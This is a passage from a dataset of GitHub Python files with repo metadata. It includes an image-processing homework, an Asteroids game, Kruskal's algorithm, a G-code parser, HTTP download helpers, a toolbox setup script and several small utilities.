Bp = 0, X, C\n elif H >= 240 and H < 300:\n Rp, Gp, Bp = X, 0, C\n elif H >= 300 and H < 360:\n Rp, Gp, Bp = C, 0, X\n \n R = (Rp + m) * 255\n G = (Gp + m) * 255\n B = (Bp + m) * 255\n #print(f'RGB: {R}, {G}, {B}')\n rgb[row, col] = np.array([R, G, B])\n\n return rgb \n\n def contrast_adjustment(self):\n pass\n\n def noise_reduction(self):\n pass\n\n def color_correction(self):\n pass\n","repo_name":"andrew15818/109","sub_path":"fall/image_processing/homework/hw1/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21039156812","text":"from inventory_report.importer.importer import Importer\n\nimport csv\n\n\nclass CsvImporter(Importer):\n @staticmethod\n def import_data(path: str):\n data = []\n\n try:\n if not path.endswith('.csv'):\n raise ValueError\n\n with open(path, mode=\"r\") as file:\n csv_file = csv.DictReader(file)\n for line in csv_file:\n data.append(line)\n return data\n except ValueError:\n raise ValueError(\"Arquivo inválido\")\n","repo_name":"martinsgabel/trybe-inventory-report","sub_path":"inventory_report/importer/csv_importer.py","file_name":"csv_importer.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30961975101","text":"__author__ = 'dare7'\n# program template for Spaceship\n# for development in external local IDE and to be complied with Codeskulptor at the same time\ntry:\n import simplegui\nexcept ImportError:\n import SimpleGUICS2Pygame.simpleguics2pygame as simplegui\nimport math\nimport random\n\n# globals for user interface\nWIDTH = 800\nHEIGHT = 600\nscore = 0\nlives = 3\ntime = 0.5\n\n# globals for ship\nSHIP_ANG_VEL_INC = 0.05\nSHIP_VEL_ACC = 0.1\nSHIP_FRICTION = 0.99\n\n# globals for rock\nROCK_SPEED = 0.001\nrocks = []\n\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n\n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n\n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 50)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\nsoundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# helper functions to handle transformations\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p,q):\n return math.sqrt((p[0] - q[0]) ** 2+(p[1] - q[1]) ** 2)\n\n# Ship class\nclass Ship:\n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n\n def draw(self, canvas):\n #canvas.draw_image(image, center_source, width_height_source, center_dest, width_height_dest, rotation)\n if not self.thrust:\n canvas.draw_image(self.image, self.image_center, self.image_size, [self.pos[0], self.pos[1]],\n self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, [self.image_center[0]+self.image_size[0], self.image_center[1]],\n self.image_size, [self.pos[0], self.pos[1]], self.image_size, self.angle)\n #canvas.draw_image(self.image, self.image_center, self.image_size, [self.pos[0], self.pos[1]], self.image_size, self.angle)\n\n def update(self):\n self.pos[0] += self.vel[0]\n self.pos[1] += self.vel[1]\n self.angle += self.angle_vel\n if self.thrust:\n self.vel[0] += angle_to_vector(self.angle)[0]*SHIP_VEL_ACC\n self.vel[1] += angle_to_vector(self.angle)[1]*SHIP_VEL_ACC\n self.vel[0] *= SHIP_FRICTION\n self.vel[1] *= SHIP_FRICTION\n if self.pos[0] < 0:\n self.pos[0] = WIDTH\n elif self.pos[0] > WIDTH:\n self.pos[0] = 0\n elif self.pos[1] < 0:\n self.pos[1] = HEIGHT\n elif self.pos[1] > HEIGHT:\n self.pos[1] = 0\n\n\n\n def turn_left(self):\n self.angle_vel -= SHIP_ANG_VEL_INC\n\n def turn_right(self):\n self.angle_vel += SHIP_ANG_VEL_INC\n\n def thrust_on(self):\n self.thrust = True\n ship_thrust_sound.play()\n\n def thrust_off(self):\n self.thrust = False\n ship_thrust_sound.rewind()\n\n def shoot(self):\n global a_missile\n # __init__(self, pos, vel, ang, ang_vel, image, info, sound = None)\n a_missile = Sprite([self.pos[0] + ship_info.get_radius()*angle_to_vector(self.angle)[0],\n self.pos[1] + ship_info.get_radius()*angle_to_vector(self.angle)[1]],\n [(self.vel[0] + angle_to_vector(self.angle)[0])*2,\n (self.vel[1] + angle_to_vector(self.angle)[1])*2],\n self.angle, 0, missile_image, missile_info, missile_sound)\n\n\n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n\n def draw(self, canvas):\n # canvas.draw_circle(self.pos, self.radius, 1, \"Red\", \"Red\")\n #canvas.draw_image(image, center_source, width_height_source, center_dest, width_height_dest, rotation)\n canvas.draw_image(self.image, self.image_center, self.image_size, [self.pos[0], self.pos[1]],\n self.image_size, self.angle)\n\n def update(self):\n self.pos[0] += self.vel[0]\n self.pos[1] += self.vel[1]\n self.angle += self.angle_vel\n #self.vel[0] += angle_to_vector(self.angle)[0]*ROCK_SPEED\n #self.vel[1] += angle_to_vector(self.angle)[1]*ROCK_SPEED\n if self.pos[0] < 0:\n self.pos[0] = WIDTH\n elif self.pos[0] > WIDTH:\n self.pos[0] = 0\n elif self.pos[1] < 0:\n self.pos[1] = HEIGHT\n elif self.pos[1] > HEIGHT:\n self.pos[1] = 0\n\n\ndef draw(canvas):\n global time, ship_ang_vel, rocks\n # animate background\n #my_ship.vel[0] += 1/60\n #my_ship.vel[1] += 1/60\n #my_ship.angle_vel += 1/60\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n\n # draw ship and sprites\n my_ship.draw(canvas)\n a_rock.draw(canvas)\n a_missile.draw(canvas)\n\n # update ship and sprites\n my_ship.update()\n #for rock in rocks:\n # rock.update()\n a_rock.update()\n a_missile.update()\n # score and lives\n canvas.draw_text(\"lives: %s\" % str(lives), (WIDTH*0.05, HEIGHT*0.1), 30, 'White', 'monospace')\n canvas.draw_text(\"score: %s\" % str(score), (WIDTH*0.75, HEIGHT*0.1), 30, 'White', 'monospace')\n\n\ndef key_down(key):\n global my_ship\n if key == simplegui.KEY_MAP[\"left\"]:\n my_ship.turn_left()\n elif key == simplegui.KEY_MAP[\"right\"]:\n my_ship.turn_right()\n elif key == simplegui.KEY_MAP[\"up\"]:\n my_ship.thrust_on()\n elif key == simplegui.KEY_MAP[\"space\"]:\n my_ship.shoot()\n\n\n\ndef key_up(key):\n global my_ship, ship_ang_vel\n if key == simplegui.KEY_MAP[\"left\"]:\n my_ship.angle_vel = 0\n elif key ==simplegui.KEY_MAP[\"right\"]:\n my_ship.angle_vel = 0\n elif key == simplegui.KEY_MAP[\"up\"]:\n my_ship.thrust_off()\n\n\n# timer handler that spawns a rock\ndef rock_spawner():\n # locally ok, crazy rotation in chrome, sorry can't get what's wrong!\n global a_rock, rocks\n #rock_pos = []\n #rock_pos[0], rock_pos[1] = 0, 0\n rock_vel1 = random.randrange(-100,100)/100\n rock_vel2 = random.randrange(-100,100)/100\n rock_pos1 = random.randrange(0, WIDTH)\n rock_pos2 = random.randrange(0, HEIGHT)\n rock_ang = random.randrange(0,628)/100\n rock_ang_vel = random.randrange(-10,10)/100\n #__init__(self, pos, vel, ang, ang_vel, image, info, sound = None)\n #a_rock = Sprite([400, 300], [0.3, 0.4], 0, 0.1, asteroid_image, asteroid_info)\n a_rock = Sprite([rock_pos1, rock_pos2], [rock_vel1, rock_vel2], rock_ang, rock_ang_vel, asteroid_image, asteroid_info)\n rocks.append(a_rock)\n #a_rock = Sprite([WIDTH / 3, HEIGHT / 3], [1, 1], 0, 1, asteroid_image, asteroid_info)\n #print(rocks)\n\n\n# quit handler\ndef quit():\n global frame\n frame.stop()\n timer.stop()\n\n\ndef init():\n # initialize frame\n global my_ship, a_rock, a_missile, frame, timer\n frame = simplegui.create_frame(\"Asteroids, by dare7\", WIDTH, HEIGHT)\n frame.set_keydown_handler(key_down)\n frame.set_keyup_handler(key_up)\n frame.add_button(\"Quit\", quit, 150)\n # initialize ship and two sprites\n my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)\n a_rock = Sprite([WIDTH / 3, HEIGHT / 3], [1, 1], 0, 0, asteroid_image, asteroid_info)\n a_missile = Sprite([2 * WIDTH / 3, 2 * HEIGHT / 3], [-1,1], 0, 0, missile_image, missile_info, missile_sound)\n\n # register handlers\n frame.set_draw_handler(draw)\n\n timer = simplegui.create_timer(1000.0, rock_spawner)\n\n # get things rolling\n timer.start()\n frame.start()\n\nif __name__ == '__main__':\n # for future import as module usage\n init()","repo_name":"dare7/Coursera-An-Introduction-to-Interactive-Programming-in-Python","sub_path":"Spaceship.py","file_name":"Spaceship.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29453331642","text":"\"\"\"\nauthor: Ricardo\nemail: ricardo_zeng@whu.edu.cn\npages of CLRS: chinese page 366 in chapter 23\n\nDiscription of the algorithms:\nMST-KRUSKAL(G, w)\n1 A = φ\n2 for each vertex v ∈ G.V\n3 MAKE-SET(v)\n4 sort the edges of G.E in nonincreasing order by weight w\n5 for each edge(u, v) ∈ G.E, taken in nondecreasing order by weight\n6 if FIND-SET(u) ≠ FIND-SET(v)\n7 A = A ∪ {(u, v)}\n8 UNION(u, v)\n9 return A\n\"\"\"\nfrom pygraph.classes.digraph import digraph\nfrom disjoint_set_data import *\n\ndef mst_kruskal(g):\n \"\"\"\n @param type: graph\n @return type: list\n \"\"\"\n # edges = list()\n v2node = dict()\n A = list()\n \n for vertex in g.nodes():\n v = tree_node(vertex)\n v = make_set(v)\n v2node[vertex] = v\n\n edges = sorted(g.edges(), key = g.edge_weight)\n # print(edges)\n\n for edge in edges:\n u, v = v2node[edge[0]], v2node[edge[1]]\n if find_set(u) != find_set(v):\n A.append(edge)\n union(u, v)\n \n return A\n\nif __name__ == '__main__':\n g = digraph()\n nodes = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n g.add_nodes(nodes)\n g.add_edge(('a', 'b'), 4)\n g.add_edge(('b', 'c'), 8)\n g.add_edge(('a', 'h'), 8)\n g.add_edge(('b', 'h'), 11)\n g.add_edge(('h', 'i'), 7)\n g.add_edge(('h', 'g'), 1)\n g.add_edge(('i', 'g'), 6)\n g.add_edge(('i', 'c'), 2)\n g.add_edge(('c', 'd'), 7)\n g.add_edge(('c', 'f'), 4)\n g.add_edge(('g', 'f'), 2)\n g.add_edge(('d', 'e'), 9)\n g.add_edge(('d', 'f'), 14)\n g.add_edge(('e', 'f'), 10)\n \n A = mst_kruskal(g)\n print(A)","repo_name":"RicardoZiTseng/CLRS_algorithms_implement","sub_path":"Graph/mst_kruscal.py","file_name":"mst_kruscal.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"29098969784","text":"\n__author__ = 'Stefan Hechenberger '\n\n\nimport math\nimport sys\nimport re\nimport os.path\nimport StringIO\n\ndebug = True\n\n\nclass GcodeReader:\n \"\"\"Parse subset of G-Code.\n\n GCODE OVERVIEW\n --------------\n See: http://linuxcnc.org/docs/html/gcode.html\n\n G0 - rapid move\n G1 - linear move\n G2,G3 - arc move\n G4 - dwell\n\n G17 - select XY-plane (default)\n G18 - select XZ-plane\n G19 - select YZ-plane\n\n G20 - inch mode\n G21 - mm mode (default)\n\n G28 - park machine\n - without params, move to machine 0,0,0\n - with params, first go there (in current cs), typ retract Z\n - (unless G28.1 programmed a different origin)\n - \"G28 G91 Z0, G90\" typically before tool change, same as \"G53 Z0, G53 X0 Y0\"\n\n G38.2-G38.5 - probe\n\n G53 - use machine coorinates for same block (G53 Z15), non-modal\n G54 - use CS 1 from now on (default)\n G55-G59 - more custom CSes\n\n G90 - absolute mode (default)\n G91 - relative mode\n\n G92 - move CS (throw error)\n\n G93 - inverse time mode\n G94 - units/mm mode (default)\n G95 - units/rev mode\n\n\n M0, M1 - pause\n M2, M30 - end\n\n M3 - start spindle CW at whatever S has been set to\n M4 - start spindle CCW at whatever S has been set to\n M5 - stop spindle\n\n M6 - stop, prompt for tool change, non-modal\n - to whatever the most recent Tx was\n\n M7 - mist coolant on\n M8 - flood coolant on\n M9 - all coolant off\n\n M62-M65 - switch digital output\n\n\n Sx - spindle speed in RPMs\n\n Fx - feedrate (default: mm/min)\n\n Tx - set active tool mode, schedule actual switch with M6\n\n\n STRATEGY\n --------\n One pass for every tool. UI to run one pass after the other.\n\n - tool\n - path\n - params: feedrate, spindle, coolant\n - move\n - move\n - params: feedrate, spindle, coolant\n - move\n - move\n - ...\n - retract\n - tool\n - ...\n\n One path/tool. Within path, a series of moves and param changes.\n Treat rapid moves like feeds with different rate.\n\n\n OUTPUT\n ------\n Output is a job with a 'kind':'mill' marker in the 'head'. The actual\n data is in 'defs':{'data':[]}. Every tool becomes one data entry.\n A data path is a series of moves and param changes.\n\n A def looks like this:\n {data':[], 'tool':'', 'toolinfo':''}\n\n The format of a data path is a series of possible action items:\n - ('G0',(x,y,z)) (mapped to move with seekrate)\n - ('G1',(x,y,z)) (mapped to move with feedrate)\n - ('F',rate) (mapped to feedrate)\n - ('S',freq) (mapped to intensity)\n - ('MIST', onoff) (mapped to air_on/off)\n - ('FLOOD', onoff) (mapped to aux_on/off)\n\n Path example (job['defs'][0]['data']):\n [('G0',(x,y,z)), ('F', 1000), ('S', 18000), ('FLOOD', True), ('G1', (x,y,z))]\n\n\n \"\"\"\n\n def __init__(self):\n # flags\n self.bTool = False\n\n # modal state\n self.G_motion = 'G0'\n self.X_pos = None\n self.Y_pos = None\n self.Z_pos = None\n self.F_rate = 0\n self.S_freq = 0\n self.S_on = False\n self.T_num = 0\n self.M_mist = False\n self.M_flood = False\n\n # tools table\n self.def_ = None\n self.toolinfo = {}\n self.rates = []\n self.freqs = []\n self.mists = False\n self.floods = False\n\n # regexes\n self.re_parts = re.compile('(X|Y|Z|G|M|T|S|F)(-?[0-9]+\\.?[0-9]*(?:e-?[0-9]*)?)').findall\n self.re_toolchange = re.compile('(M6)').findall\n self.re_T = re.compile('(T)([0-9]+)').findall\n self.re_toolinfo = re.compile('\\((T[0-9]+) *(.+) *\\)').findall\n\n # output job\n self.job = {'head':{'kind':'mill'}, 'defs':[]}\n\n\n def finalize_pass(self):\n if self.def_:\n self.def_['rates'] = self.rates\n self.def_['freqs'] = self.freqs\n self.def_['mists'] = self.mists\n self.def_['floods'] = self.floods\n\n\n def next_pass(self):\n self.rates = []\n self.freqs = []\n self.mists = False\n self.floods = False\n self.job['defs'].append({'data':[], 'tool':'', 'toolinfo':''})\n self.def_ = self.job['defs'][-1]\n self.path = self.def_['data']\n\n\n def on_toolchange(self, line):\n \"\"\"Handle a tool change action (M6).\n Account for T action on same line (nothing more).\n \"\"\"\n T_code = self.re_T(line)\n if len(T_code) == 1:\n self.T_num = T_code[0][1]\n nParts = 2\n else:\n nParts = 1\n # commit tool change\n if len(self.re_parts(line)) != nParts:\n print(\"ERROR: cannot handle anything but T on M6 toolchange line\")\n else:\n self.finalize_pass()\n self.next_pass()\n self.bTool = True\n # add tool, toolinfo to def\n tool = 'T'+str(self.T_num)\n self.def_['tool'] = tool\n if tool in self.toolinfo:\n self.def_['toolinfo'] = self.toolinfo[tool]\n\n\n def on_action(self, action):\n if not self.bTool:\n print(\"ERROR: no tool defined at: %s:%s\" % action)\n return\n self.path.append(action)\n\n\n def parse(self, gcodestring):\n \"\"\"Convert gcode to a job file.\"\"\"\n for line in gcodestring.splitlines():\n # reject line condition\n if len(line) == 0 or line[0] not in ('X', 'Y', 'Z', 'G', 'M', 'T', 'S', 'F'):\n # parse tool table\n if line.startswith('(T'):\n toolinfo = self.re_toolinfo(line)\n if toolinfo:\n self.toolinfo[toolinfo[0][0]] = (toolinfo[0][1])\n # reject\n else:\n continue\n\n # on tool change action (M6)\n if self.re_toolchange(line):\n self.on_toolchange(line)\n continue\n\n bMotion = False\n bFeed = False\n bSpindle = False\n bMist = False\n bFlood = False\n\n # lines with valid start char\n for code_ in self.re_parts(line):\n # convert numeral\n code = [code_[0], float(code_[1])]\n if code[1].is_integer(): code[1] = int(code[1])\n # target coordinates\n if code[0] == 'X':\n self.X_pos = code[1]\n bMotion = True\n elif code[0] == 'Y':\n self.Y_pos = code[1]\n bMotion = True\n elif code[0] == 'Z':\n self.Z_pos = code[1]\n bMotion = True\n # params: feedrate, freq, tool\n elif code[0] == 'F':\n self.F_rate = code[1]\n bFeed = True\n elif code[0] == 'S':\n self.S_freq = code[1]\n elif code[0] == 'T':\n self.T_num = code[1]\n # spindle frequency change\n elif code[0] == 'M' and code[1] in (3,5):\n if code[1] == 3:\n self.S_on = True\n bSpindle = True\n elif code[1] == 5:\n self.S_on = False\n bSpindle = True\n # coolant valve change\n elif code[0] == 'M' and code[1] in (7,8,9):\n if code[1] == 7:\n if not self.M_mist:\n self.M_mist = True\n bMist = True\n elif code[1] == 8:\n if not self.M_flood:\n self.M_flood = True\n bFlood = True\n elif code[1] == 9:\n if self.M_mist:\n self.M_mist = False\n bMist = True\n if self.M_flood:\n self.M_flood = False\n bFlood = True\n # motion style change\n elif code[0] == 'G' and code[1] in (0,1):\n self.G_motion = 'G'+str(code[1])\n # handle reporting of unsupported gcode\n elif code[0] == 'G' and code[1] in (2,3):\n print(\"ERROR: G2,G3 arc motions not supported\")\n elif code[0] == 'G' and code[1] in (4,):\n print(\"ERROR: G4 dwell motions not supported\")\n elif code[0] == 'G' and code[1] in (53,):\n print(\"ERROR: G53 machine CS motion not supported\")\n elif code[0] == 'G' and code[1] in (55,56,57,58,59):\n print(\"ERROR: G55-G59 CS not supported\")\n elif code[0] == 'G' and code[1] in (91,):\n print(\"ERROR: G91 relative motion not supported\")\n elif code[0] == 'G' and code[1] in (92,):\n print(\"ERROR: G92 shift CS not supported\")\n elif code[0] == 'G' and code[1] in (93,95):\n print(\"ERROR: G93,G95 alternative distance modes not supported\")\n elif code[0] == 'M' and code[1] in (0,1):\n print(\"ERROR: M0,M1 pause not supported\")\n elif code[0] == 'M' and code[1] in (4,):\n print(\"ERROR: M4 reverse spindle not supported\")\n elif code[0] == 'M' and code[1] == (20,):\n print(\"ERROR: inch units not supported\")\n\n ### commit actions in right order\n # commit coolant\n if bMist:\n self.on_action(('MIST',self.M_mist))\n self.mists = True\n if bFlood:\n self.on_action(('FLOOD',self.M_flood))\n self.floods = True\n # commit spindle\n if bSpindle:\n if self.S_on:\n self.on_action(('S',self.S_freq))\n self.freqs.append(self.S_freq)\n else:\n self.on_action(('S',0))\n # commit feedrate\n if bFeed:\n self.on_action(('F',self.F_rate))\n self.rates.append(self.F_rate)\n # commit motion\n if bMotion:\n self.on_action((self.G_motion,(self.X_pos, self.Y_pos, self.Z_pos)))\n\n self.finalize_pass()\n return self.job\n\n\nif __name__ == '__main__':\n path = sys.argv[1]\n with open(path, 'r') as content_file:\n content = content_file.read()\n reader = GcodeReader()\n job = reader.parse(content)\n print(job)\n","repo_name":"nortd/driveboardapp","sub_path":"backend/jobimport/gcode_reader.py","file_name":"gcode_reader.py","file_ext":"py","file_size_in_byte":10714,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"92"} +{"seq_id":"73104042220","text":"#coding:utf8\n\n'''\nTools for Http request and response.\n\n@author: LeoTse\n'''\n\nimport os\nimport json\nimport urllib2\nimport httplib\nimport commands\n\n'''\nCall GET method API and return the response.\n\n@param server_conf:format {\"gateway\":\"gateway info\"}\n@param params:format [(\"param1\", \"value1\"), (\"param2\", \"value2\"), ...] \n'''\ndef invoke_get_api(server_conf, api, params):\n # url example: http://192.168.9.245/videos?id=0&hash=\"acxd23asd2dafpiojufdufhiqofqo\"\n gateway = server_conf[\"gateway\"]\n params_str = \"&\".join([\"=\".join(e) for e in params])\n \n # you can use below but sometimes it can't work when data is too long.\n # The reason is that .read() isn't guaranteed to return the entire response, given the nature of sockets.\n# url = \"http://{gateway}/{api}?{params_str}\".format(gateway=gateway, api=api, params_str=params_str)\n# req = urllib2.Request(url) \n# rep = urllib2.urlopen(req)\n# res = rep.read()\n \n ip_addr, port = gateway.split(\":\")\n http_conn = httplib.HTTPConnection(ip_addr, port)\n http_conn.request(\"GET\", \"/{api}?{params_str}\".format(api=api, params_str=params_str))\n res = http_conn.getresponse().read()\n \n return res\n \n'''\nCall POST method API and return the response.\n\n@param server_conf:format {\"gateway\":\"gateway info\"}\n@param post_data:format {\"key1\":\"value1\",\"key2\":\"value2\", ...} \n'''\ndef invoke_post_api(server_conf, api, post_data):\n # url\n gateway = server_conf[\"gateway\"]\n post_data_urlencode = json.dumps(post_data)\n\n url = \"http://{gateway}/{api}\".format(gateway=gateway, api=api)\n req = urllib2.Request(url=url, data=post_data_urlencode)\n rep = urllib2.urlopen(req)\n res = rep.read()\n\n return res\n\n'''\nDownload file from given url and store it in given path.\n'''\ndef download_file_by_url(file_url, file_name, file_store_path):\n # example:\n # wget -O /home/leotse/test/test.mp4 \\\n # http://192.168.9.230:9096/group1/M00/00/00/wKgJ51VasR6AdCYSAI58WC-SRBw304.mp4\n file_path = os.path.join(file_store_path, file_name)\n rt, _ = commands.getstatusoutput(\"wget -O {dst_path} '{src_url}'\".format(dst_path=file_path, src_url=file_url))\n\n return rt == 0\n\ndef get_content(url):\n response = urllib2.urlopen(url)\n content = response.read()\n response.close()\n return content\n ","repo_name":"leotse90/common_tools","sub_path":"net_utils/http_utils.py","file_name":"http_utils.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"27033714210","text":"def partition(arr,low,high):\r\n pivot=arr[high]\r\n i=low-1 #pointer for greater element\r\n j=0\r\n for j in range(low,high):\r\n if(arr[j]<=pivot):\r\n i+=1\r\n arr[i],arr[j]=arr[j],arr[i]\r\n arr[i+1],arr[high]=arr[high],arr[i+1]\r\n return i+1 \r\n \r\ndef quickSort(arr,low,high):\r\n if(low None\n This function takes a Unicode string and encodes it to the output.\n \"\"\"\n data = []\n basestring_type = six.string_types[0]\n for value in row:\n if not isinstance(value, basestring_type):\n value = '%s' % (value,)\n data.append(value.encode('utf-8'))\n self.writer.writerow(data)\n data = self.queue.getvalue()\n data = data.decode('utf-8')\n self.stream.write(data)\n self.queue.truncate(0)\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n","repo_name":"2ps/djenga","sub_path":"djenga/csv/unicode_csv_writer.py","file_name":"unicode_csv_writer.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"19374192166","text":"from pprint import pprint\n\n\ndef movie_info(movie, genres):\n genres_names = []\n genre_ids = movie[\"genre_ids\"]\n for genre_id in genre_ids:\n for genre in genres:\n if genre_id == genre[\"id\"]:\n genre_name = genre[\"name\"]\n genres_names.append(genre_name)\n\n new_movie_info = {\n \"genre_names\": genres_names,\n \"id\": movie[\"id\"],\n \"overview\": movie[\"overview\"],\n \"title\": movie[\"title\"],\n \"vote_average\": movie[\"vote_average\"],\n }\n\n return new_movie_info\n\n# 함수 def movie_info()를 return을 통해서 값을 설정해줘야한다.","repo_name":"minw0095/TIL","sub_path":"example/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23645723942","text":"#! /usr/bin/python\nimport os\n\nfrom utils.setup_toolbox import mac_address, get_facility_name\nfrom utils.setup_toolbox import get_serial\n\ndef configure_site():\n \"\"\"\n configures toolbox\n :return:\n \"\"\"\n # Configures the site\n # install pip\n print(\"Step 1 : Update laptop\")\n answer = os.system(\"sudo apt-get update\")\n print(\"Step 2: Install Pip.\")\n # os.system(\"sudo apt install python3-pip\")\n os.system(\"python3 -m pip install --user --upgrade pip\")\n #os.system(\"python3 -m venv flask3\")\n os.system(\"python3 -m venv flask3\")\n print(\"*********** SETTING FACILITY DETAILS *****************\")\n os.system(\". flask3/bin/activate && pip3 install -r requirements.txt && sudo apt-get install git\")\n\n print(\"******************************************************\")\n os.system(\". flask3/bin/activate && python3 -c 'from utils.setup_toolbox import \"\n \"get_facility_name; \"\n \"get_facility_name()'\")\n mac_address()\n # get system serial number\n get_serial()\n print(\"*********** END - Facility Configured Successfully *****************\")\n print(\"creating Toolbox Service\")\n os.system(\"sudo cp toolbox.desktop ~/Desktop/\")\n # here is the code for creating the site.\n os.system(\"sudo cp toolbox.service /etc/systemd/system/\")\n os.system(\"sudo systemctl daemon-reload && sudo systemctl start toolbox && sudo systemctl enable toolbox\")\n print(\"FINISHED :creating Toolbox Service \\n\")\n print(\"******************************************************************** \\n\")\n print (\"Lastly select other modules installed !\")\n os.system(\". flask3/bin/activate && python3 -c 'from utils.setup_other_apps import \"\n \"choose_app; \"\n \"choose_app()'\")\n print(\"FINISHED :Setting up other modules\")\n return True\n\n\ndef main():\n \"\"\"\n startup function\n :return: boolean\n \"\"\"\n configure_site()\n return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DoxDevOps/toolbox-offline-exporter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36697412966","text":"# Similar to finding regex pattern\n# time: O(NM)\n# space O(NM)\n\ndef findLength(self, A: List[int], B: List[int]) -> int:\n dp = [[ 0 for _ in range(len(B)+1)] for j in range(len(A)+1)]\n max_len = 0\n for i in range(1, len(dp)):\n for j in range(1, len(dp[0])):\n if A[i-1] == B[j-1]:\n dp[i][j] = dp[i-1][j-1]+1\n\n for r in dp:\n max_len = max(max(r), max_len)\n return max_len\n\n","repo_name":"adreena/MyStudyCorner","sub_path":"LeetCode/codes/718.py","file_name":"718.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74440333753","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom itertools import product\n\nimport hypothesis.strategies as st\nfrom hypothesis import given, settings\nfrom hypothesis.stateful import rule, initialize, 